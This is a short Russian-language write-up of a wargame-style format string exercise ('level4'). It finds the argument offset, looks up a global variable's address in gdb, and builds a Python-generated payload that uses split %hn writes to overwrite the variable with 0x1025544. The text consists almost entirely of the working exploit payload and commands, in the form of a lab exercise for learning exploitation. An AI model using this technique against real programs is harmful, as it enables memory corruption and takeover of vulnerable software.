упражение идентично предыдущему, но теперь значение переменной требуется изменить не на 0х40 а на 0х1025544
функция ожидает увидеть аргумент теперь на 12 позиции:
r <<<$(python -c 'print "UUUU %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x"')
UUUU b7ff26b0 bffff724 b7fd0ff4 0 0 bffff6e8 804848d bffff4e0 200 b7fd1ac0 b7ff37d0 55555555 20782520 25207825 78252078
адрес глобальной переменной также изменился:
info variables m
0x08049810  m
чтобы не смотреть как терминал печатает 16930116 пробелом, мы можем
разделить число на два при помощи использования %hn, тогда
первая часть 0102 (258-8=250), а вторая 5544(21828-258=21570)
не забывает little endian, значит они %13$hn и 12 соответственно, итак:
python -c 'print "\x10\x98\x04\x08\x12\x98\x04\x08" + "%250x%13$hn%21570x%12$hn"' > /tmp/exploit4
cat /tmp/exploit4 | ./level4
